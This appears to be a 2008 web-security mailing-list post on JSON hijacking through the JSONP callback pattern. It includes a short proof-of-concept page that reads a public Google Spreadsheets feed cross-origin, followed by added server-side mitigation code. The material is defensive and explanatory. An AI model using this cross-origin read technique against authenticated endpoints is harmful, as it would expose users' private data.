[WEB SECURITY] JSON Hijacking - Cross-browser issue
- From: "application.secure application.secure" <application.secure@xxxxxxxxx>
- Subject: [WEB SECURITY] JSON Hijacking - Cross-browser issue
- Date: Thu, 14 Aug 2008 21:48:12 +0200
Hello community,
I'm currently investigating AJAX security (based on the excellent book by Billy
Hoffman & Bryan Sullivan).
The interesting chapter on JSON Hijacking speaks about a JSON issue based
on Array and Object function clobbering, which works only on Mozilla.
Maybe the next topic has been discussed before in the security community...
the issue works on IE and Mozilla.
For example, spreadsheets.google.com proposes a JSON service based on a
call-back pattern.
In this case, the JSON end-point is public... so there is no problem!
My conclusion is that the call-back pattern is insecure... Avoid the use of
the call-back pattern.
----------------------------------------------------
<html>
<script>
// Callback named in the request below. The endpoint answers with a script of
// the form "listEntries({...feed...});", so any page that includes that
// script gets the feed data handed to this function.
function listEntries(json) {
  var ret = "";
  for (var i = 0; i < json.feed.entry.length; i++) {
    var entry = json.feed.entry[i];
    ret += entry.title.$t;
    ret += entry.content.$t;
  }
  alert(ret);
}
</script>
<!-- Cross-origin script include; the "callback" parameter selects the function above. -->
<script id="external_script" src="http://spreadsheets.google.com/feeds/list/o13394135408524254648.240766968415752635/od6/public/values?alt=json-in-script&callback=listEntries"></script>
</html>
----------------------------------------------------
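The post's demo page works because a `<script src>` include runs the callback wrapper in any origin, with the browser's cookies attached. The added example below (not from the original post or from Google's service) shows the server-side distinction a defender wants: keep the callback (JSONP) pattern only for data that is already public, validate the callback name so the response cannot be turned into arbitrary script, and return session-bound data as plain JSON that a script include cannot execute. It goes slightly beyond the post by showing the mitigation side as well as the problem. `renderFeed`, `parseProtectedJson`, `isExecutableScript`, the minimal request object and `SAMPLE_FEED` are all hypothetical names and constructed data for this illustration.

```javascript
// Hypothetical server-side response shaping for a feed endpoint.
// Request shape assumed here (constructed, not a real framework API):
//   { authenticated: bool, query: { callback }, headers: { 'x-requested-with' } }

// Prefix that makes the body a JavaScript syntax error when loaded via <script src>,
// while a same-origin XMLHttpRequest can still read the text and strip it.
const PROTECTIVE_PREFIX = ")]}',\n";

// Only a plain identifier is accepted as a callback name; anything else would
// let the caller inject script into a response served as application/javascript.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*$/;

// Constructed sample data in the shape the post's listEntries() expects.
const SAMPLE_FEED = {
  feed: {
    entry: [
      { title: { $t: 'Q3 budget' }, content: { $t: 'salary: 1200' } },
      { title: { $t: 'Q4 budget' }, content: { $t: 'salary: 1300' } }
    ]
  }
};

function renderFeed(req, feed) {
  const query = req.query || {};
  const headers = req.headers || {};
  const body = JSON.stringify(feed);

  if (!req.authenticated) {
    // Public data: a callback wrapper leaks nothing, so JSONP is acceptable.
    if (query.callback !== undefined) {
      if (!CALLBACK_RE.test(query.callback)) {
        return { status: 400, contentType: 'text/plain', body: 'invalid callback' };
      }
      return {
        status: 200,
        contentType: 'application/javascript',
        body: query.callback + '(' + body + ');'
      };
    }
    return { status: 200, contentType: 'application/json', body: body };
  }

  // Session-bound data: never wrap it in a callback. A third-party page that
  // includes this URL as a script would receive the victim's data.
  if (query.callback !== undefined) {
    return { status: 400, contentType: 'text/plain', body: 'callback not allowed on authenticated feeds' };
  }
  // A <script> tag cannot add request headers; requiring one limits the
  // endpoint to XMLHttpRequest callers under the same-origin policy.
  if (headers['x-requested-with'] !== 'XMLHttpRequest') {
    return { status: 403, contentType: 'text/plain', body: 'forbidden' };
  }
  return { status: 200, contentType: 'application/json', body: PROTECTIVE_PREFIX + body };
}

// Client side (same-origin XHR): strip the prefix, then parse with JSON.parse,
// never with eval() or a script include.
function parseProtectedJson(text) {
  if (!text.startsWith(PROTECTIVE_PREFIX)) {
    throw new Error('missing protective prefix');
  }
  return JSON.parse(text.slice(PROTECTIVE_PREFIX.length));
}

// Helper for checking the property we rely on: does the body compile as a
// script? (Compiling does not run it; the callback is never invoked here.)
function isExecutableScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return false;
  }
}
```

With this split, the public feed from the post still works as JSONP, while an authenticated feed answered with the prefix fails to compile when loaded through `<script src>` and is only readable by same-origin code that knows to strip the prefix.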
Brought to you by http://www.webappsec.org